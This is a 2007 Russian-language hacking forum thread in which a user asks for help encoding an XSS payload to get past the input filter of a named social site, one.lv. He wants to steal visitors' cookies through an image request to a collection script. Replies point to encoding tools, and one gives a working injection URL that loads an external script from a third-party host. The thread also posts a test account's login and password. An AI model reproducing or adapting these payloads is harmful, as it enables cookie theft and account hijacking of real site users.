ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

xss шифровка
  #1  
Старый 09.12.2007, 14:56
offiks
Новичок
Регистрация: 16.01.2007
Сообщений: 16
Провел на форуме:
56466

Репутация: 6
По умолчанию xss шифровка

помогите вставить скрипт
--><script>document.write(String.fromCharCode(<scrip t>document.write("<img src=http://127.0.0.1/skript.php?kuki_one="+escape(document.cookie)+">") ;</script>));</script><!--
и обойти фильтр
Я ломал голову, да нету у меня особых навыков навыков, но хотелось бы сделать, помогите пожалуйста перекодировать чтоб сайт принял мою наживу
 
Ответить с цитированием

  #2  
Старый 09.12.2007, 15:04
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию

Цитата:
и обойти фильтр
А фильтр на что ругаеться?
 
Ответить с цитированием

  #3  
Старый 09.12.2007, 15:07
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

в программе inetcrack http://old.antichat.ru/inetcrack/можно перевести
 
Ответить с цитированием

  #4  
Старый 09.12.2007, 15:09
Dumkopff
Познающий
Регистрация: 05.04.2006
Сообщений: 76
Провел на форуме:
2310584

Репутация: 73
По умолчанию

http://old.antichat.ru/crackchat/HTML/
кури.
 
Ответить с цитированием

  #5  
Старый 09.12.2007, 15:11
offiks
Новичок
Регистрация: 16.01.2007
Сообщений: 16
Провел на форуме:
56466

Репутация: 6
По умолчанию

я честно не могу разобратся в чём дело но ко мне доходит только: &quot; escape(document.cookie) &quot;

по моему он не обробатывает плюсы, но когда я заменил плюсы на %2B он всё равно это же и присылает.

P.S. большое спасибо за отзывчевость
 
Ответить с цитированием

  #6  
Старый 09.12.2007, 15:22
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Dumkopff  
http://old.antichat.ru/crackchat/HTML/
кури.
если ты не в курсе инет кряк как раз и делает это, есть такая строка как стринг =\ хех
 
Ответить с цитированием

  #7  
Старый 09.12.2007, 15:33
offiks
Новичок
Регистрация: 16.01.2007
Сообщений: 16
Провел на форуме:
56466

Репутация: 6
По умолчанию

я всё равно могу и декодировать и тут http://ha.ckers.org/xss.html#XSScalc , там всё же есть? не так ли? =[

эту уязвимость я пытаюсь осуществить на сайте one.lv (в поле слева - найти друга (http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.fri ends.fl.search=тут)

помогите подходяще закодировать пробовал кодировать весь урл, всё равно не работает...

Пожалуйста для меня это вопрос сложный, уже 2 день парюсь
 
Ответить с цитированием

  #8  
Старый 09.12.2007, 15:42
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию

пля. там нужна регистрация... При реге надо воодить телефон =\ Я так понял туда пасс отправляеться =\
 
Ответить с цитированием

  #9  
Старый 09.12.2007, 15:45
offiks
Новичок
Регистрация: 16.01.2007
Сообщений: 16
Провел на форуме:
56466

Репутация: 6
По умолчанию

ой забыл, я хотел написать и подготовленый акаунт, извеняюсь
Login: offx
password: antichat

кстате, когда я ему впариваю %22%2B%22 он их декодирует не в: "+" (как должно быть) а в: &quot; &quot;

Последний раз редактировалось offiks; 09.12.2007 в 15:47..
 
Ответить с цитированием

  #10  
Старый 09.12.2007, 15:58
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию

http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.fri ends.fl.search=%22%3E;%3Cscript%20src=http://lamer-power.jino-net.ru/hek%3E%20%3C/script%3E
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss без Xss k00p3r Чужие Статьи 5 08.09.2008 15:53
Активная XSS на mail.ru Dronga E-Mail 69 05.04.2008 01:56
Новая XSS на форуме phpBB 2.0.19 NeMiNeM Форумы 6 26.10.2006 21:30
Xss Расширенный межсайтовый скриптинг SNIFF Чужие Статьи 0 24.11.2005 08:08
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ